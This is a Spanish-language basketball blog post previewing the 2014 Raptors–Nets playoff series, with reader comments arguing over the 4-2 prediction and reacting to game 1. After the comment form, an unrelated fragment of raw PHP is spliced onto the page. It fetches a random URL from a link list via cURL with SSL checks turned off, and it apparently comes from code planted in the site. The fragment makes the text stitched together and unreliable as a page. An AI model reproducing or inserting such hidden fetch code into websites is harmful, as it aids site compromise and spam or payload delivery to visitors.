PO 2014: Previa Toronto Raptors – Brooklyn Nets

19 de April de 2014 por TheDeerHunter

Seguramente estamos ante el cruce más impredecible e igualado de primera ronda. Los precedentes nos dan un empate a 2, con diferencias ínfimas en 3 de los 4 encuentros previos.

Los Raptors llegan crecidos después de firmar la mejor regular de su corta historia, curiosamente un año en el que, tras el traspaso de Rudy Gay, nadie hubiera dado un duro por ellos más allá de un buen pick de lotería. Los Nets, tras una inversión cuasi sonrojante, se tiraron dos meses buscándose a si mismos. La llegada del 2014 y algunas lesiones de hombres de peso liberaron a Jason Kidd a la hora de meter a Livingston en el quinteto, usar un atípico small-ball con Pierce de 4 y Joe Johnson de 3, dando también más protagonismo al rookie Mason Plumlee. La llegada de Marcus Thornton fue otro acierto en un equipo que le costaba horrores anotar. La recta final ha sido francamente buena y en este punto son un rival temible, especialmente al calor de su público. Además, deben estar locos de alegría de que al final les haya tocado en suerte el rival teóricamente más débil que había en liza. Lo que sí es un hándicap para ellos es la baja de Brook Lopez, su mejor jugador durante los 17 partidos que únicamente pudo disputar.

Ésta es otra historia de “La Cenicienta”. O quizá una versión baloncestística de “Hombre rico, hombre pobre”. Es buen momento para comprobar si a esta liga le queda algo de romanticismo o el simple golpe de talonario es suficiente.

Claves de la eliminatoria:

  • El grado de la experiencia: 156 partidos de playoffs disputados por la plantilla de los Raptors al completo. Sólo entre Pierce y Garnett acumulan 267. En un hipotético 7º partido sería una ventaja abismal a pesar del factor cancha a favor de los canadienses.
  • El reverso tenebroso de la faena bien hecha: Para los Raptors la temporada es un éxito indiscutible pase lo que pase. Los Nets en cambio están diseñados para cotas más altas. Caer ahora sería una catástrofe. La gestión de motivaciones y presiones será un factor decisivo en esta serie.
  • Small ball vs Classic ball: No cabe duda de que el recurso de Paul Pierce de ala-pívot ha sido el as bajo la manga que tenía guardado Jason Kidd. Si los Raptors no consiguen generar importantes desequilibrios con su juego interior van a tener un problema.
  • The Inglourious Basterds: Resulta irónico que en una eliminatoria donde uno de los rivales le saca más de 30 millones de dólares en salary cap al otro los protagonistas puedan llegar a ser los secundarios. Shaun Livingstone, Amir Johnson, Andray Blatche, Terrence Ross, Mason Plumlee, Patrick Paterson, Marcus Thornton, John Salmons, Alan Anderson, Tyler Hansbrough, Alan Anderson… están llamados a inclinar la balanza hacia alguno de los dos lados.
  • Lowry vs Deron: Aunque hoy nos parezca mentira hubo un tiempo en el que el base de los Nets era considerado generalmente como el mejor base del mundo. Hoy es Lowry quien pugna con firmeza por ser considerado como el mejor de la conferencia, para muchos de largo. Esta serie es un escaparate inmejorable para él, a fin de constatar ante el gran público lo infravalorado que ha estado y la injusticia que supuso no ser llamado para el all-star. Si los Nets no pierden este duelo por mucho tendrán buena parte del camino recorrido.

Pronóstico: 4-2 Raptors. Me decanto por las potentes piernas del joven equipo que ha deslumbrado este curso, aunque no se descarta una victoria de Brooklyn, especialmente si se llega a un 7º encuentro.

Comenta

16 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Me parece que el pronóstico es equivocado. Como bien has dicho la experiencia es fundamental en los Playoffs, y en Toronto todos están muy verdes. Además también dices otra cosa cierta, y es que Toronto no tiene nada que demostrar. Me recuerda a aquellos Hawks que les valía con entrar en Playoffs. Me parece que los Pierce, Garnett, Johnson, Kirilenko, etc. van a tirar de DNI para sacar esto adelante. Veo un 4-2 a favor de Brooklyn. Además piensa el fracaso que sería para los Nets caer otra vez en primera ronda… No lo veo tu pronóstico, sí todo lo demás. Muchos secundarios van a ser importantes, aunque por ejemplo Salmons y Thornton cobran una pasta. Por lo que cobran deberían ser fundamentales. Salmons seguro que no lo será, es cancerígeno. Thornton va a generar rachas de anotación desde la segunda unidad.

    MASON PLUMLEE creo que va a ser el protagonista de esta eliminatoria. Puede parar a Valanciunas y lo debe atacar, ya que el lituano suele tener problemas de faltas

      Citar

  2. TheDeerHunter dice:
    #2

    Duro eres… “pronóstico equivocado” son gruesas palabras para hablar de una simple apuesta en una eliminatoria que se va a decidir por detalles. Puedes decir que yo apuesto otra cosa… y ya de paso ¿qué es lo que nos apostamos? XD
    Lo dices tú mismo. Aquí no sólo está la experiencia en juego, está para empezar el físico con Toronto que ha estado todo el curso saliéndose en este sentido, y está la presión como tú mismo reconoces, y la presión a veces hace que te entre el tembleque en el brazo al armarlo. Sin ir más lejos el año pasado Deron y compañía ya se hicieron algunas cacotas ante los Bulls en el 7º, siendo para mi superiores.
    Sobre que Salmons y Thornton cobran una pasta, es cierto, aunque su rol es de secundarios, como digo.

      Citar

  3. Sancho88 dice:
    #3

    Lo de Salmons y Thornton es obra y magia del señor Geoff Petrie, que menos mal que se ha retirado, porque las liaba pardas…
    Veo pronóstico equivocado porque está basado en una supuesta superioridad de los Raptors que marca la clasificación, pero no olvidemos de donde vienen estos Nets, de las cloacas de la liga en los dos primeros meses de competición y con uno de los mejores records de toda la NBA desde enero: 34-17. 67% de victorias. Es decir, pierden un partido cada semana de media. No les veo pegándose el batacazo. Deron está de dulce, Joe Johnson está de dulce, Pierce lo mismo, Mason Plumlee también, y Shaun Livingston por fin tiene un lugar en la liga, se lo merece. Y desde el banco tienen recursos para rotar muy bien y mucha experiencia. Es que Deer, no es que no sea un buen análisis el tuyo, sino que no veo el pronóstico. Por ejemplo, creo que Valanciunas se la va a pegar. Es un Vucevic de la vida, garrapiña eficiencia pero no sabe competir, o al menos de momento no lo ha demostrado. Tengo su Eurobasket de Eslovenia clavado en la cabeza… fue lamentable, aunque gran parte de la culpa la tenía su entrenador porque le daba 10 minutos o menos a veces. Pero es eso, no me fio de Valanciunas, Amir no me parece que pueda dar un paso adelante, y DeRozan y Lowry están muy solos a mi juicio para derribar a un equipazo de esta calaña en Playoffs. Lo siento Deer pero creo que te has equivocado con el pronóstico, pero es mi opinión, ojo, si hay debate significa que la eliminatoria está reñida.

    Por cierto, Raptors 34-19 desde enero. 64% de victorias. Son records muy parecidos, ya digo, poniendo a los Nes desde enero que es cuando empezaron a jugar. Puede ser una comparación válida, porque los dos equipos nos van a dar algo parecido a lo que han estado haciendo hasta ahora. Tú dices que el factor cancha pesará a favor de Raptors, y yo digo factor experiencia de Brooklyn. Puede que haya séptimo partido, y tu 4-2 a favor de Raptors sea pelín exagerado y mi 4-2 a favor de Brooklyn también. Objetivamente es muy probable que haya séptimo partido

      Citar

  4. Esteban dice:
    #4

    como dice sancho todo me tira a ir por los Nets y su basta experiencia, pensando que lso Raptors se van a caer

    Pero venimos creyendo que los Raptors se caeran hace 3 meses y siguen resistiendo y logrando el tercer puesto en su conferencia, donde ademas tendran ventaja de localia

    aun asi, me la juego por los Nets, algo sacaran desde adentro “la Verdad” y KG, como lo han hecho casi siempre con los celtics

      Citar

  5. TheDeerHunter dice:
    #5

    Ya que lo mencionas, Sancho, yo a quien veo fino, fino es a Lowry… y de quien me fío muy poco visto lo visto este año es de Garnett, que además no sé si llevará muy bien que venga el rookie de turno y le coma la tostada con todos los focos encima.
    También me fío muy poco de ese small ball con Pierce en ritmo playoffs y cómo van a montar la defensa.
    Tengo muchas ganas de ver esta serie. De hecho justo ahora mismo me estoy haciendo el aperitivo con el NBA today del 2k14 jugando este partido en concreto. (Ganan los Raptors y Lowry la está liando cosa mala XD)
    El partido empieza a las 18:30 de aquí, ojo. Hoy va a ser un día de yonkis nba.

      Citar

  6. Sancho88 dice:
    #6

    Vale, jeje, Lowry está de dulce, a un nivel espectacular, incluso mejor que antes del All-Star donde era candidato a entrar y al final no entró. Si hoy fuera el all-star, Lowry estaría sí o sí. Pero ya digo, veo poco un Lowry+DeRozan. Vale, Garnett está retirado, literalmente. Él lo ha dicho, que se dio la última oportunidad de venir a Nets porque se iba Pierce con él, si no estaría retirado. Y es que le ves jugar y está retirado. El año pasado ya… muy justo, pidiendo la hora, hace dos años fue su último explendor, recordad el pedazo año que se marcó. Y ahora está fatal. Que se lo tome como quiera, pero Mason se lo come con patatas, y Teletubi también… y Blatche también. Deer, te has parado a analizar la rotación de los Nets? Hablas de la defensa Nets centrándola en Pierce y Garnett…. no es objetivo. Hay muchos jóvenes ahí para defender. Que siempre vemos a los Nets como un equipo de viejos y lento, pero tienen también gente joven desde la segunda unidad que luego se convierten en primera unidad con la rotación de Kidd, donde la primera unidad es anecdótica. Si me dijeras que la rotación de los Nets es una mierda, ok, a reventarse físicamente está claro que los Raptors les mean, pero el físico se equilibra bastante con esa segunda unidad de los Nets.

    Joder, es que la eliminatoria va a estar muy igualada. Va a ser tema pizarra, ajuste sobre ajuste. Casey tiene que tener unas ganas terribles de mear a Kidd, y para Kidd esta es su reválida. Esta eliminatoria dan ganas de verla en HD en pantallón de 50 pulgadas o algo así… jejeje

      Citar

  7. TheDeerHunter dice:
    #7

    Vamos, lo de que va a estar igualada no te lo discuto. De hecho es lo primero que digo. Incluso te admito que los favoritos son los Nets y es perfectamente posible, e incluso probable, que me la tenga que envainar.
    Has dado en el clavo. Yo les veo viejos y lentos… y para defender como deberían con ese sistema tienen que ponerle piernas y cojones. Tengo dudas si vamos a ver tanto lo uno como lo otro.
    Los jovenes de la plantilla son Teague (21) que apenas va a jugar, Plumlee (24) y Gutierrez (25).
    Después están Lopez (26) lesionado y Thornton (26) con mentalidad de “ya lo he visto todo no me jodáis con matarme a defender”. Blatche (27) a saber qué versión vemos. Livingston (28) que va a ser clave, pero está muy castigado, Teletovic (28) no es un perro de presa y Deron (29) que da la impresión de ser mucho más veterano de lo que es.
    El resto la vieja guardia…

      Citar

  8. Sancho88 dice:
    #8

    Deron-Livingston-JJ-Pierce-Mason
    Thornton-Blatche-Teletubi

    No son tan matados, en Playoffs le van a poner ganas. Thornton tiene otra actitud ahora, él quería compeir no morirse del asco en Sacramento. Está jugando muy fino y físico le sobra. Que luego quiera ponerle ganas… eso es ya otra cosa muy diferente. Yo creo que sí va a poner ganas.

    En NBA.COM la gente vota 5 a 1 a favor de los Raptors!!

    Los Raptors lo bueno que tienen es la combinación Lowry-Ross-LaZorra-Vásquez. Pueden combinarlos casi como quieren. Particularmente me gusta mucho cuando coinciden Lowry y Vásquez en la pista. En defensa y en ataque te dan mucho. No sé si va a jugar Patterson. Se lo pierde por lesión no? Una pena porque sería muy importante para los Raptors.

    Supongo que será una eliminatoria larga y con partidos no demasiado igualados. Y ahora digo por qué. Creo que cada equipo va a blindar muy bien su cancha, y los partidos se decidirán por el ritmo que logren imponer los equipos. A los Raptors les conviene irse a anotaciones de más de 100 puntos, y a los Nets jugar en estático para JJ y Pierce con Deron y Livingston controlando el tempo del partido. Si el partido se pone loco Kidd tiene a Thornton y Teletovic para intentar compensar.

    Las opciones tácticas de esta eliminatoria son infinitas. Es basket para amantes del basket

      Citar

  9. TheDeerHunter dice:
    #9

    No tengo noticias de lo de Patterson. Yo diría que está disponible. Sería una putada, porque también está fuerte.
    El único que estaba DTD era DeRozan y no puedo creer que no vaya a estar.

      Citar

  10. Mamba_Blanca dice:
    #10

    Empieza fuerte Deron con 11 puntos y un 2/2 en triples en los 10 primeros minutos.

      Citar

  11. Lucho dice:
    #11

    Vieron la tapa del Toronto Sun?
    Raptors vs Dinosaurs

    Me hace acordar a “vamos a retirar a Zidane”, pero mas alla de eso, muy creativa

      Citar

  12. Nacho dice:
    #12

    Luego llega Pierce y hace lo que te acaba de hacer a falta de un minuto. Jugón.
    Bueno, yo no apuesto aquí porque les doy a los Nets campeones de conferencia.

      Citar

  13. Ruxixon dice:
    #13

    Bueno,de que sirve tener a un tio como Paul Pierce…para que haga 9 puntos en el último 4º,anotando canastas calientes que de no entrar te complican la vida.Factor cancha recuperado,1-0 para los Nets.

      Citar

  14. Sancho88 dice:
    #14

    Te equivocaste con el pronóstico Deer!! Mujajajajajaa (maliciosamente). Muy bisoños estos Raptors. Parecía que en el segundo cuarto renacían con Vásquez y Lowry juntos, pero después no han sabido rematar. Buenas sensaciones Valanciunas, muy superior a los interiores de los Nets, y Patterson en la segunda parte. LaZorra para matarla directamente… Y Pierce pues es Pierce. Si no tiene que hacer nada en defensa y solo tiene que salir para hacer sus canastas en momentos clave… de puta madre para él. No, realmente partido muy completo de los Nets, con Williams y JoJo tocando el acordeón, Pierce al final y les ha sobrado. Garnett es ex jugador… da pena verlo arrastrándose. Hombre, en el último cuarto ha dado un poco más, pero la primera parte vergonzosa… de lo peor que le he visto en su carrera. De todas maneras, la serie es muy larga y los Raptors van a ganar partidos. Que no cunda el pánico.

    El momentazo del partido el tío del cronómetro y el del micrófono, con lo de toda la vida, los de la mesa gritando… 10!! 5!! etc. Ha sido gracioso jajaja

      Citar

  15. TheDeerHunter dice:
    #15

    Me da en la nariz que no me voy a hacer rico con esto de los pronósticos. XD XD
    Mañana hablaremos largo y tendido, pero los que considerábais la diferencia de experiencia como la principal clave habéis acertado.

      Citar

  16. Miguel Gonzalez dice:
    #16

    Y los pronosticoas de muchos se cayeron , Los raptors jugaron mejor de lo esperado, y hoy tienen chance de liquidar, si superan sus problemas de cerrar partidos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>